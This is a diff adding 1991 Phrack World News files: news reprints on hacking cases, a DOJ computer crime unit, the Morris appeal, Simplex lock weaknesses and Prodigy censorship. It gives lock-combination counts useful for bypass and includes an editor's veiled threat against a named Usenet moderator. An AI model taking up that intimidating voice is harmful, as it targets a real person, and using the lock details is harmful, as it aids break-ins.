+and publisher of 2600 Magazine: The Hacker Quarterly, told those in attendance
+at an October 17th New York City press conference that "the American public is
+often lulled into a false sense of security; a security that is often not
+supported by the facts of specific cases."
+
+The videotapes, produced by 2600 and provided to the press show both the
+intrusion of a Dutch "hacker" in to United States Military computers and what
+Goldstein alleges is the fallibility of a brand of mechanical, pushbutton locks
+used by, among others, New York State University sites, Federal Express, United
+Parcel Service, JFK International Airport, IBM and NASA.
+
+Goldstein told Newsbytes "We invested considerable time and money to wake
+people up to the fact that we have a false sense of security when it comes not
+only to computer networks but to physical safety as well."
+
+The tape of the Dutch "hacker" was made by Goldstein while in Europe. and shows
+the intrusion into a Unites States Army computer system.  The intruder was able
+to set up a fictitious account called "danquayle" and, once into the system,
+was able to obtain "root" privileges thus giving him total control of the
+workings of the system.
+
+A portion of this tape had previously been shown with Goldstein's approval on
+an episode of the Geraldo Rivera television show "Now It Can Be Told".
+Goldstein told Newsbytes that one^S^Q reason for his release of the entire tape to
+the press was his feeling that the Rivera episode entitled "The Mad Hacker's
+Key Party" had distorted the message of the tape -- "This was not a case of a
+terrorist break-in but was rather simply a demonstration of the lack of
+security of our systems.  To find root accounts with password like "Kuwait" and
+lack of sophisticated security in our military computers should be of real
+concern and should not be lost in an exploitation of the 'hacker' issue."
+
+A background paper provided at the conference by 2600 explains the entire
+intrusion effort in detail and states "The purpose of this demonstration is to
+show just how easy it really was.  Great care was taken to ensure that no
+damage or alteration of data occurred on this particular system.  No military
+secrets were taken and no files were saved to a disk by the hackers.  What is
+frightening is that nobody knows who else has access to this information or
+what their motivations might be.  This is a warning that cannot be taken
+lightly."
+
+The second videotape show Goldstein and other 2600 staff opening seemingly at
+will locks manufactured by Simplex Security Systems.  The locks of the
+mechanical pushbutton combination variety were shown to be installed at the
+State of New York University at Stony Brook, JFK International Airport and on
+Federal Express and United Parcel pick-up boxes throughout the New York
+Metropolitan area.
+
+In the film, Goldstein is shown filling out a Federal Express envelope for
+delivery to 2600 Magazine and inserting in the Fedex dropbox.  He then lifts
+the weather protection cover on the box's lock and keys a combination that
+allows him to open the lock and remove his envelope.  Scott Skinner, a SUNY
+student and 2600 staff member told Newsbytes that it had actually taken the
+staff 10 minutes to determine the proper code combinations to open the lock.
+
+Skinner explained, "While Simplex prefers people to think that there is an
+endless number of permutations to the lock, there are actually only 1,085.  In
+most cases, even this number is greatly reduced -- if one knows that only three
+buttons are being used, it reduces the possibilities to 135.  Additionally, we
+found that, once we had the combination to one Federal Express dropbox, it
+worked in every other one that we tried in the New York area."
+
+Goldstein told Newsbytes "When we contacted Simplex, they first denied that the
+locks were unsafe and then said that the permutations were much greater.  After
+some discussion, they admitted that the 1,085 figure was correct but said that
+it would take a person with a complete listing of the combinations over four
+hours to try them all. Our experience obviously shows that they may be opened
+in a much shorter time than that."
+
+Goldstein also pointed out that, "although a $5 Master combination lock may be
+broken by a crowbar, it is a much more secure combination device.  It has
+64,000 combinations compared to the 1,085 with the Simplex."
+
+Goldstein continued, "One of the real problems is that, should a person have
+the misfortune to be robbed, entry due to a failure of the Simplex lock gives
+no evidence of a forcible break-in and police and insurance companies often put
+the blame on the homeowner or office manager for 'giving away the combination.'
+It really can create a problem."
+
+Skinner told Newsbytes "I'm really concerned about t^Shis.  I'm a student at
+SUNY, Stony Brook and all our dormitories use these locks as the only means of
+security.  I've shown the problem to Scott Law who is responsible for residence
+security but he has discounted the problem and said that the locks were
+installed at the recommendation of the campus locksmith.  The locksmith, Garry
+Lenox contradicts Law and says that he recommended against these locks years
+ago and said that they were not secure for dormitory use."  Skinner said that
+he will write an article for the college newspaper in an attempt to raise
+consciousness about this problem.
+
+Goldstein also said that he intends to publish the list of valid combinations
+in an up-coming iss^Que of 2600 to demonstrate to the public the problems with
+the lock.  He further said that he will raise the issue on his weekly radio
+show, "Off The Hook", heard on New York's WBAI-FM.
+
+In response to a Newsbytes question concerning how the 2600 staff happened to
+become involved in a problem with locks, Goldstein said, "We're hackers and
+when we see something with buttons on it, whether it's a computer or not, we
+tend to try it.  While the average person tends to accept that things are
+secure just because he is told that they are, hackers will usually try them
+out.  It's because of this 'trying out' that we can point out the problems with
+both the US military computer security and this lock -- and we feel that, in
+both cases, we have performed a service. People should be aware when they are
+at risk so that they may take action to correct it."
+_______________________________________________________________________________
+ 
+Questions Exist On Israeli Break-In Of US Systems            September 10,1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+NEW YORK -- Amidst reports of the intrusion by an Israeli national into United
+States military computer systems, there have been conflicting accounts of the
+extent and nature of the invasion.
+
+According to wire services, Deri Schriebman, an 18 year-old graduate of
+Israel's Technion Institute and a native of the northern Israeli city of
+Carmiel, was arrested by Israeli police for allegedly breaking into US military
+computers and commercial credit card systems.  Israeli spokes person Eitan Raz,
+commenting on the equipment found at Schriebman's home for allegedly making
+free overseas phone calls, was quoted as saying "This was a very complex
+system. It was the first time such technology was discovered in Israel."
+
+Newsbytes has ben able to confirm with sources that a trail of credit card
+fraud in the United States and Canada led investigators to Schriebman but has
+not been able to confirm that Schriebman, as reported in Israeli press, was
+able to access classified Pentagon information concerning Patriot missiles
+during the recent Gulf War.  A US government investigative official told
+Newsbytes that, while his agency has formally requested documentation of the
+events from the Israeli police, that there seems to have been no contact to
+date between any US service and the Israeli investigators.
+
+Other investigative sources have told Newsbytes that the investigation into
+Schriebman's activities began in May 1991 when two Quebec teenagers were
+arrested for purchasing goods through the use of stolen credit card
+identification.  The teenagers told Canadian authorities that they had received
+the information from a source in Carmiel, Israel and the authorities notified
+Israeli police.  According to the Israeli reports, Schriebman admitted the
+intrusion into credit card files and the subsequent dissemination of codes but
+denied making any use of the information. He was quoted as saying that his
+cracking into the systems was done only out of curiosity.
+
+A "hacker" source told Newsbytes that underground bulletin boards utilized for
+the exchange of such credit information are often frequented by foreign
+nationals. He said that the most frequent visitors come from Australia, Israel
+and Germany and that many of the Israelis identify themselves as have a
+connection with the Technion Institute.
+_______________________________________________________________________________
diff --git a/phrack35/11.txt b/phrack35/11.txt
new file mode 100644
index 0000000..f8adec9
--- /dev/null
+++ b/phrack35/11.txt
@@ -0,0 +1,517 @@
+                                ==Phrack Inc.==
+
+                 Volume Three, Issue Thirty-five, File 11 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN            Issue XXXV / Part Two            PWN
+              PWN                                             PWN
+              PWN            Compiled by Dispater             PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Justice Revs Up Battle On Computer Crime                        October 7, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Michael Alexander (ComputerWorld)(Page 4)
+
+Washington D.C. -- The nation's top federal computer crime law enforcers
+announced plans to escalate the war on computer crime.
+
+At the federal government's 14th National Computer Security Conference held in
+Washington D.C., officials at the U.S. Department of Justice said the
+department is launching a computer crime unit that will be charged with
+prosecuting crimes and pushing for stiffer penalties for convicted computer
+outlaws.
+
+"Computer crime is on the rise, and the Justice Department is taking this area
+very seriously -- as well as the FBI, U.S. Secret Service, and the military,"
+said Mary Spearing, chief of general litigation and legal advice in the
+criminal division at the Justice Department.
+
+The new crime unit will also advocate closing loopholes in the government's
+computer crime statute.  The Computer Fraud & Abuse Act of 1986 "is outmoded
+and outdated," said Scott Charney, a computer crime prosecutor and chief of the
+new computer crime unit.
+
+The Justice Department wants to amend the law with a provision that would make
+inserting a virus or worm into a computer system a crime, Charney said.
+
+Those convicted of computer crimes will more often be sentenced according to
+federal guidelines rather than on recommendation of prosecutors, who may ask
+for lighter penalties, said Mark Rasch, the government's attorney who
+prosecuted Robert Morris in the infamous Internet worm case.
+
+A new Justice Department policy now mandates that all defendants will be
+treated equally, without regard for personal history or other factors that
+might mitigate stiffer sentences, Rasch said.
+
+"The penalties for computer crime will become increasingly more severe,"
+predicted Kent Alexander, assistant U.S. attorney in Atlanta <prosecutor of the
+Atlanta members of the Legion of Doom>.  "In five years, they are going to look
+back and think a year in jail was a light sentence."
+
+The FBI is "staffing up to address concerns about computer crimes" and
+increasing its training efforts, said Mike Gibbons, FBI supervisory special
+agent <who worked on both the Morris and the Clifford Stoll KGB hackers
+cases>.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Supreme Court Refuses Morris Appeal                            October 14, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Michael Alexander (ComputerWorld)(Page 14)
+
+Washington, D.C. -- The U.S. Supreme Court refused without comment to hear
+Robert T. Morris' appeal last week, ending a legal journey that began nearly
+three years ago when he injected a worm into the Internet network.
+
+While the trek is over for Morris, there remain serious questions about the
+Computer Fraud and Abuse Act of 1986, the statute under which he was
+prosecuted.
+
+The refusal to review the Morris case leave intact a "bone breaker" law that
+could transform otherwise law-abiding computer users in felons and inhibit the
+creative uses of computer technology according to Thomas Viles, an attorney at
+the Silverglate & Good law firm in Boston.  Viles authored a friend of the
+court brief in the Morris appeal on behalf of the Electronic Frontier
+Foundation.
+
+Some legal experts worry that computer users who enter a computer system
+without authorization, either unwittingly or with the intention of merely
+looking around, could be given penalties that are overly severe.
+
+"A single computer entry is of an entirely different order than the destruction
+of data or the intentional alteration of data, just as simple trespass is
+pretty minor stuff compared to vandalism or burglary," Viles said.  "Now if
+people whose livelihoods depend on computers get into somebody else's computer
+without authorization, they could be in Leavenworth for five years."
+
+The Morris appeal boiled down to the critical question of whether he intended
+to cause the harm that ensued after he set loose his ill-conceived computer
+program on November 2, 1988.
+
+In 1990, a federal judge in Syracuse, New York ruled that it was not necessary
+for the government to prove that Morris intended to cause harm, only that
+Morris intended to access computers with authorization or to exceed
+authorization that he may have had.  Earlier this year a federal appeals court
+upheld Morris' May 1990 conviction under which he received three years
+probation, a $10,000 fine, and 400 hours of community service.
+
+That affirmation goes against the widely accepted tenet that an injury can
+amount to a crime only when deliberately intended, Viles said.  "The law
+distinguishes, say, between murder and manslaughter.  You can't be guilty of
+murder if the killing was utterly accidental and unintended."
+
+A General Accounting Office (GAO) report released in 1989 noted other flaws in
+the federal computer statute.  While the law makes it a felony to access a
+computer without authorization, the law does not define what is meant by
+"access" or "authorization," the GAO reported.
+
+UPDATING THE LAW
+
+U.S. Department of Justice Officials recently acknowledged that the Computer
+Fraud and Abuse Act is outdated and noted that it should be refined <see
+Justice Revs Up Battle On Computer Crime (the previous article)>.  Scott
+Charney, chief of the Justice Department's newly created computer crime unit,
+said the department will lobby to fortify the law with provisions that would
+outlaw releasing viruses and worms and make it a felony to access a computer
+without authorization and cause damage through reckless behavior.
+
+Trespassing into a computer is more serious than it may appear at first
+glance, Charney said.  "It is not easy to determine what happened, whether
+there was damage, how safe the system now is or what the intruder's motives
+were."
+
+Some legal experts said they believe the law is already overly broad and do not
+advocate expanding it with new provisions.  "It is a far-reaching law, whose
+boundaries are still not known," said Marc Rotenberg, an attorney and director
+of the Washington, D.C. office of Computer Professionals for Social
+Responsibility.  "The way I read the law is, the Justice Department has
+everything it needs and more," he said.  "After the Morris decisions, if you
+sneeze, you could be indicted."
+
+The Morris case pointed out deficiencies in the law that have resulted from
+technology's rapid advance, said Thomas Guidoboni, the Washington, D.C.-based
+attorney who defended Morris.
+
+Neither Guidoboni nor Morris were surprised by the Supreme Court's refusal to
+hear his appeal, according to Guidoboni.  "Robert's case had a particular
+problem in that it was the first one involving the 1986 act.  They like to take
+cases after the circuit courts had had some chance to play with them and see if
+there is a disagreement."
+
+Morris is working as a computer programmer in Cambridge, Massachusetts for a
+company that "knows who he is and what he's done," Guidoboni said.  He declined
+to identify the company.
+
+<Editor's Note: Morris was actually the SECOND person to be tried under the
+ 1986 Computer Fraud and Abuse Act.  The first person was Herbert Zinn, Jr.
+ a/k/a Shadow Hawk of Chicago, Illinois, who was convicted in 1989 in a
+ prosecution led by William Cook, a now former assistant U.S. attorney whose
+ name most of you should recognize from the Craig Neidorf (Knight Lightning)
+ and Lynn Doucette (Kyrie) cases.
+
+ Zinn was tried as a minor and therefore in a bench trial before a sole judge.
+ Morris is the first person to be tried under the Act in front of a jury.
+ Zinn's conviction earned him 10 months in a juveniles prison facility in South
+ Dakota, a fine of $10,000, and an additional 2 1/2 years of probation that
+ began after his prison term ended.
+
+ For additional information about the Shadow Hawk case, please read "Shadow
+ Hawk Gets Prison Term," which appeared in Phrack World News, Issue 24,
+ Part 2.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Justice Unit Spurred On By Cross-Border Hackers                October 21, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Michael Alexander (ComputerWorld)(Page 6)
+
+Washington D.C. -- The U.S. Department of Justice's formal launch of a computer
+crime unit was prompted largely by an alarming rise in computer invasions that
+traverse geographic and jurisdictional boundaries, according to a top Justice
+Department official.
+
+Robert Mueller III, assistant U.S. attorney general, said the Justice
+Department needs to be better prepared to prosecute computer criminals.  he is
+one of the architects of a five-person unit recently established by the justice
+department expressly to combat computer crime.
+
+"One of the principal functions of the unit is to anticipate areas where
+federal, state, and local law enforcement will have to expend resources in the
+future," Mueller said.  "One that comes immediately to our attention is crime
+related to computers used as a target as in The Cuckoo's Egg."  He was
+referring to author Clifford Stoll's account of how he tracked West German
+hackers who penetrated U.S. computers for the KGB in exchange for cash and
+cocaine.
+
+Increasingly, computer crimes cut across state and international boundaries,
+making them difficult to investigate because of jurisdictional limits and
+differing laws, Mueller said.  The computer crime unit will be charged with
+coordinating the efforts of U.S. attorneys general nationwide during
+investigations of crimes that may have been committed by individuals in several
+states.
+
+One of the unit's first assignments will be to take a pivotal role in OPERATION
+SUN-DEVIL, last year's much-publicized roundup of computer hackers in several
+states.  That investigation is still under way, although no arrests have
+resulted, Justice Department officials said.
+
+The unit will coordinate efforts with foreign law enforcers to prosecute
+hackers who enter U.S. computer systems from abroad while also working to
+promote greater cooperation in prosecuting computer criminals according to
+Mueller.
+
+The unit will also assist in investigations when computers are used as a tool
+of a crime -- for example, when a computer is used to divert electronically
+transferred funds -- and when computers are incidental to a crime, such as when
+a money launderer uses a computer to store records of illegal activities,
+Mueller said.
+
+"There have been many publicized cases involving people illegally accessing
+computers, from phone phreaks to hackers trying to take military information,"
+said Scott Charney, chief of the new computer unit.  "Those cases have high
+importance to us because any time that computers are the target of an offense,
+the social cost is very high.  If you bring down the Internet and cripple 6,000
+machines and inconvenience thousands of users, there is a high social cost to
+that type of activity."
+
+The computer crime unit will also work to promote closer cooperation between
+the Justice Department and businesses that have been the victims of computer
+crime, Charney said.
+
+Law enforcers are better trained and more knowledgeable in investigating and
+prosecuting computer crimes, Charney said.  "Businesses need not be concerned
+that we are going to come in, remove all of their computers, and shut their
+businesses down.  FBI and Secret Service agents can go in and talk to the
+victim in a language they understand and get the information they need with a
+minimum amount of intrusion."
+
+<Editor's Note:  "Businesses need not be concerned that we are going to come
+ in, remove all of their computers, and shut their businesses down."  Excuse
+ me, but I think STEVE JACKSON GAMES in Austin, Texas might disagree with that
+ statement.  Mr. Charney -- Perhaps you should issue an apology!>
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+                           V  I  E  W  P  O  I  N  T
+
+Let's Look Before We Legislate                                 October 21, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Marc Rotenberg (ComputerWorld)(Page 25)
+
+    "Laws Are Adequate To Handle Computer Crime -- 'Net Police' Not Needed"
+
+The U.S. Department of Justice is now circulating a proposal to expand the
+reach of federal computer crime law.  On first pass, this might seem a sensible
+response to concerns about computer crime.  The reality, however, it that the
+current federal law is more than adequate and the Justice Department proposal
+is poorly conceived.
+
+The Justice Department proposal will give federal agencies broad authority to
+investigate computer crime, allowing them to intercede in any situations
+involving a computer hooked to a network.
+
+Creating a worm or virus could become a felony act, no questions asked.
+Espionage laws would be broadened and intent requirements would be lowered.
+Certain procedural safeguards would be removed from existing law.
+
+CURRENT LAW ADEQUATE
+
+Taken as a whole, the proposal will make it possible for the federal government
+to prosecute many more computer crimes, but the question is whether this
+additional authority will improve computer security.  Between the current
+federal statute, the Morris decision, and the sentencing guidelines, federal
+prosecutors already have more than enough tools to prosecute computer crime.
+
+Under the Computer Fraud & Abuse Act, passed in 1984 and amended in 1986, the
+unauthorized use of a computer system is a felony.  Though the act does not
+define what "authorization" is or how it is obtained, a person found guilty
+faces up to five years in jail and fines of $250,000.  It is a far-reaching law
+whose boundaries are still not known.
+
+THE MORRIS FACTOR
+
+The Morris case strengthened the hand of federal prosecutors still further.
+The judge ruled that it was not necessary for the government to prove that
+Morris intended the harm that resulted when the worm was released, only that he
+intended unauthorized use when he did what he did.
+
+>From a common law viewpoint, that's a surprising result.  Traditional criminal
+law distinguishes between trespass, burglary, and arson.  In trespass, which is
+a misdemeanor, the offense is entering onto someone else's property.  Burglary
+is simple theft and arson is destruction.  To punish a trespasser as an
+arsonist is to presume an intent that may not exist.
+
+A federal appeals court affirmed the Morris decision, and the Supreme Court has
+refused to hear his appeal, so now the computer crime statute is essentially a
+trip-wire law.  The government only has to show that the entry was unauthorized
+-- not that any resulting harm was intentional.
+
+There is another aspect of the Morris case that should be clearly understood.
+Some people were surprised that Morris served no time and jumped to the
+conclusion that sentencing provisions for this type of offense were
+insufficient.  In fact, under the existing federal sentencing guidelines,
+Morris could easily have received two years in jail.  The judge in Syracuse,
+New York, considered that Morris was a first-time offender, had no criminal
+record, was unlikely to commit a crime in the future, and, not unreasonably,
+decided that community service and a stiff fine were appropriate.
+
+To "depart" as the judge did from the recommended sentence was unusual.  Most
+judges follow the guidelines and many depart upwards.
+
+That said, if the Department of Justice persists in its efforts, there are at
+least three other issues that should be explored.
+
+UNANSWERED QUESTIONS
+
+First there is the question of whether it is sensible to expand the authority
+of federal agents at the expense of local police and state government.  If
+theft from a cash register is routinely prosecuted by local police, why should
+the FBI be called in if the cash register is a computer?
+
+What will happen to the ability of state government to tailor their laws to
+their particular needs?  Do we really want "Net Police"?
+
+There is also the need to explore the government's performance in recent
+computer crime investigations before granting new powers.  For example, the
+botch Operation Sun-Devil raid, which involved almost one quarter of all Secret
+Service agents, resulted in hardly a conviction.  (A good cop could have done
+better in a night's work.)
+
+In a related investigation, Steve Jackson, the operator of a game business in
+Texas was nearly forced out of business by a poorly conceived raid.
+
+In fact, documents just released to Computer Professionals for Social
+Responsibility by the Secret Service under the Freedom of Information Act raise
+substantial questions about the conduct, scope, and purpose of Operation
+Sun-Devil investigations.  They reveal, for example, that the Secret Service
+monitored and downloaded information from a variety of on-line newsletters and
+conferences.
+
+A congressional hearing to assess Operation Sun-Devil would certainly be in
+order before granting federal officials new powers.
+
+PROTECTION OF RIGHTS
+
+Finally we should not rush to create new criminal sanctions without fully
+recognizing the important civil liberties interests in information
+technologies, such as the rights of privacy and free expression.  There are,
+for example, laws that recognize a special First Amendment interest in newsroom
+searches.
+
+But no case has yet made clear the important principle that similar protections
+should be extended to computer bulletin boards.  New criminal sanctions without
+necessary procedural safeguards throws off an important balance in the criminal
+justice system.
+
+Expanding the reach of federal law might sound good to many people who are
+concerned about computer crime, but broadening criminal law is always
+double-edged.  Could you prove to a court that you have never used a computer
+in an "unauthorized" manner?
+
+<Editor's Note:  Marc Rotenberg is the Director of the Washington office of
+ Computer Professionals for Social Responsibility and he has testified in both
+ the House of Representatives and the Senate on computer crime legislation.>
+_______________________________________________________________________________
+
+PWN Quicknotes
+~~~~~~~~~~~~~
+
+1.  Operation Sun-Devil Scope Emerges (ComputerWorld, 10/14/91, page 119)
+--
+    The Computer Professionals for Social Responsibility (CPSR), an advocacy
+    group, received more than 2,400 documents from the U.S. Secret Service
+    under the Freedom of Information Act.  The documents relate to Operation
+    Sun-Devil, last year's nationwide dragnet through the hacker underground.
+    An early look at the documents reveals that the scope of the operation was
+    considerably broader than the U.S. Secret Service has admitted, said Marc
+    Rotenberg, director of CPSR's Washington, D.C. office.  CPSR will soon hold
+    a press conference to discuss the findings, he added.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+2.  6 Police Employees Probed for Wiretaps (Washington Post/AP, 10/24/91, page
+    A4) -- Jefferson City, Missouri -- Missouri's Highway Patrol is
+    investigating six employees implicated in three illegal wiretaps, officials
+    said.
+
+    The wiretaps were "stupid" and were intended to "gain personal information
+    in an effort to supervise subordinates," said Colonel C.E. 'Mel' Fisher,
+    the patrol's chief.
+
+    Fisher said that six employees are on administrative leave without pay
+    after a two-month internal investigation confirmed conversations were
+    recorded at patrol headquarters and at a troop office in Kirkwood,
+    Missouri.
+
+    Fisher did not identify the employees, who face hearings that could lead
+    to possible penalties ranging from a written reprimand to dismissal.  It is
+    a federal felony to conduct an illegal wiretap.  He said the FBI
+    investigated the wiretaps.
+
+    Major Bobby G. Gibson, chief of the patrol's Criminal Investigation Bureau,
+    in which two of the wiretaps occurred, committed suicide on October 9,
+    1991.  He was among five defendants in a $7 million federal lawsuit filed
+    recently by a black patrolman, Corporal Oliver Dixon, who alleged he had
+    been wiretapped and denied promotions because of his race.  All of the
+    defendants, including Fisher, are white.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+3.  Patrick Townson, the moderator of the Internet's Telecom Digest
+    (comp.dcom.telecom) was less than pleased when an unknown person placed
+    Phrack 34 into alt.dcom.telecom.  Townson consistently preaches about the
+    evils of hacking, but we know that he did not learn everything he knows
+    about telecommunications in the classroom.  See you after World War Three
+    Pat!  We know who you are, we know who you WERE and we know what crimes
+    you have committed in the realm of telecommunications.  We're anxious to
+    talk some more with you about this in the near future.
+
+    See below:
+
+    "I assume you saw the stuff which was left in alt.dcom.telecom today:
+    A whole series of messages telling how to break into several voicemail
+    systems; how to break into the MILNET; a program designed to discover
+    passwords; and other obnoxious files.  All of them were left by the same
+    anonymous user at the same non-existent site.  Siemens Medical Systems
+    (one of the victims in the theft-of-voicemail-services tutorial in
+    alt.dcom.telecom today) has been notified that their 800 number link to
+    voicemail is now under attack, and given the box number involved.  Like
+    cockroaches, you can stomp on those people all you like; they seem to
+    survive.  One person has said in the event of WW-3, the only species to
+    survive will be the cockroaches and the hackerphreaks.  Good socially
+    responsible computing, that's what it is!   PAT"
+_______________________________________________________________________________
+
+4.  The existence of back issues of Phrack Inc. found in a user's home
+    directory was enough for a system administrator at Tufts University in
+    Massachusetts to revoke a users account.  Michael Godwin, an attorney for
+    the Electronic Frontier Foundation went to bat for this individual and
+    succeeded in restoring the user's account.  The incident prompted the
+    following response by a reader of Telecom Digest (comp.dcom.telecom):
+
+     On Oct 19 at 11:51, TELECOM Moderator writes:
+
+     > Is it easier and more pragmatic for a
+     > system administrator to answer to his/her superiors regarding files at
+     > the site which harassed or defrauded some third party (ie. telco) or
+     > to simply remove the files and/or discontinue the feed"   PAT]
+
+     But this requires a judgment call on the part of the system
+     administrator, does it not?  Most of the system administrators that I
+     know are too busy administering the system to worry about this file or
+     that feed, except perhaps as it relates to traffic volume or disk space
+     consumed.
+
+     Will we ever get to the point where those in charge will stop dreaming of
+     practicing mind control?  I am so sick of those who are paranoid that
+     someone somewhere may actually express an uncontrolled thought or idea to
+     someone else.
+
+     Ah, the advantages of owning one's own UUCP site ...
+_______________________________________________________________________________
+
+5.   The National Public Network Begins Now.  You Can Help Build it.
+
+     Telecommunications in the United States is at a crossroads.  With the
+     Regional Bell Operating Companies now free to provide content, the shape
+     of the information networking is about to be irrevocably altered.  But
+     will that network be the open, accessible, affordable network that the
+     American public needs?  You can help decide this question.
+
+     The Electronic Frontier Foundation recently presented a plan to Congress
+     calling for the immediate deployment of a national network based on
+     existing ISDN technology, accessible to anyone with a telephone
+     connection, and priced like local voice service.  We believe deployment of
+     such a platform will spur the development of innovative new information
+     services, and maximize freedom, competitiveness, and civil liberties
+     throughout the nation.
+
+     The EFF is testifying before Congress and the FCC; making presentations to
+     public utility commissions from Massachusetts to California; and meeting
+     with representatives from telephone companies, publishers, consumer
+     advocates, and other stakeholders in the telecommunications policy debate.
+
+     The EFF believes that participants on the Internet, as pioneers on the
+     electronic frontier, need to have their voices heard at this critical
+     moment.
+
+     To automatically receive a description of the platform and details, send
+     mail to archive-server@eff.org, with the following line:
+
+     send documents open-platform-overview
+
+     or send mail to eff@eff.org.
+_______________________________________________________________________________
+
+6.  The September/October 1991 issue of The Humanist has a cover story
+    regarding Cyberspace, rights and freedoms on nets such as Usenet, and makes
+    reference to Craig Neidorf, Jolnet, Prodigy and other matters.
+_______________________________________________________________________________
+
+7.  A Virginia Beach restaurateur plead guilty to illegally taping a telephone
+    call by Governor L. Douglas Wilder and said he arranged for the tape to be
+    delivered to the staff of Senator Charles Robb, D-Va., hoping it would be
+    damaging to Wilder and politically helpful to Robb.
+
+    Robert Dunnington, a onetime social companion of Robb's, admitted in
+    federal court that he intercepted a 1988 car phone call by then-Lt.
+    Governor Wilder as part of his hobby of monitoring and recording cellular
+    calls.
+
+    From February 1988 to October 1990, Dunnington overheard and taped hundreds
+    of calls and, his attorney said, it was "just happenstance" that Wilder's
+    call was picked up.  (Washington Post)
+_______________________________________________________________________________
+
+8.  A Federal District Judge in New York ruled that a computer-network company
+    is not legally liable for the contents of information it disseminates.
+    While the decision could be influential because it tackles free speech on
+    an electronic network, it is not clear how the ruling would affect bulletin
+    boards ^S^Qon which users add comments.  The decision concerned an electronic
+    gossip column carried by CompuServe.  In the decision, the judge stated
+    "CompuServe has no more editorial control over such a publication than
+    does a public library, bookstore or newsstand, and it would be no more
+    feasible for CompuServe to examine every publication it carries for
+    potentially defamatory statements than it would be for any other
+    distributor to do so."  (Wall Street Journal, October 31, 1991)
+_______________________________________________________________________________
diff --git a/phrack35/12.txt b/phrack35/12.txt
new file mode 100644
index 0000000..54600e9
--- /dev/null
+++ b/phrack35/12.txt
@@ -0,0 +1,532 @@
+                                ==Phrack Inc.==
+
+                 Volume Three, Issue Thirty-five, File 12 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue XXXV / Part Three           PWN
+              PWN                                             PWN
+              PWN            Compiled by Dispater             PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Prodigy Stumbles as a Forum...Again
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Mike Godwin (Electronic Frontier Foundation)
+
+     On some days, Prodigy representatives tell us they're running "the Disney
+Channel of online services."  On other days the service is touted as a forum
+for "the free expression of ideas."  But management has missed the conflict
+between these two missions.  And it is just this unperceived conflict that has
+led the B'nai B'rith's Anti-Defamation League to launch a protest against the
+online service..
+
+     On one level, the controversy stems from Prodigy's decision to censor
+messages responding to claims that, among other things, the Holocaust never
+took place.  These messages--which included such statements as "Hitler had some
+valid points" and that "wherever Jews exercise influence and power, misery,
+warfare and economic exploitation ... follow"--were the sort likely to stir up
+indignant responses among Jews and non-Jews alike.  But some Prodigy members
+have complained to the ADL that when they tried to respond to both the overt
+content of these messages and their implicit anti-Semitism, their responses
+were rejected by Prodigy's staff of censors.
+
+     The rationale for the censorship?  Prodigy has a policy of barring
+messages directed at other members, but allows messages that condemn a group.
+The result of this policy, mechanically applied, is that one member can post a
+message saying that "pogroms, 'persecutions,' and the mythical holocaust" are
+things that Jews "so very richly deserve" (this was an actual message).  But
+another member might be barred from posting some like "Member A's comments are
+viciously anti-Semitic."  It is no wonder that the Anti-Defamation League is
+upset at what looks very much like unequal treatment.
+
+     But the problem exposed by this controversy is broader than simply a badly
+crafted policy.  The problem is that Prodigy, while insisting on its Disney
+Channel metaphor, also gives lip service to the notion of a public forum.
+Henry Heilbrunn, a senior vice president of Prodigy, refers in the Wall Street
+Journal to the service's "policy of free expression," while Bruce Thurlby,
+Prodigy's manager of editorial business and operations, invokes in a letter to
+ADL "the right of individuals to express opinions that are contrary to personal
+standards or individual beliefs."
+
+     Yet it is impossible for any free-expression policy to explain both the
+allowing of those anti-Semitic postings and the barring of responses to those
+postings from outraged and offended members.  Historically, this country has
+embraced the principle that best cure for offensive or disturbing speech is
+more speech.  No regime of censorship--even of the most neutral and well-
+meaning kind--can avoid the kind of result that appears in this case: some
+people get to speak while others get no chance to reply.  So long as a board of
+censors is in place, Prodigy is no public forum.
+        
+     Thus, the service is left in a double bind.  If Prodigy really means to be
+taken as a computer-network version of "the Disney Channel"--with all the
+content control that this metaphor implies--then it's taking responsibility for
+(and, to some members, even seeming to endorse) the anti-Semitic messages that
+were posted.  On the other hand, if Prodigy really regards itself as a forum
+for free expression, it has no business refusing to allow members to respond to
+what they saw as lies, distortions, and hate.  A true free-speech forum would
+allow not only the original messages but also the responses to them.
+
+     So, what's the fix for Prodigy?  The answer may lie in replacing the
+service's censors with a system of "conference hosts" of the sort one sees on
+CompuServe or on the WELL.  As WELL manager Cliff Figallo conceives of his
+service, the management is like an apartment manager who normally allows
+tenants to do what they want, but who steps in if they do something
+outrageously disruptive.  Hosts on the WELL normally steer discussions rather
+than censoring them, and merely offensive speech is almost never censored.
+
+     But even if Prodigy doesn't adopt a "conference host" system, it
+ultimately will satisfy its members better if it does allow a true forum for
+free expression.  And the service may be moving in that direction already:
+Heilbrunn is quoted in the Wall Street Journal as saying that Prodigy has been
+loosening its content restrictions over the past month.  Good news, but not
+good enough--merely easing some content restrictions is likely to be no more
+successful at solving Prodigy's problems than Gorbachev's easing market
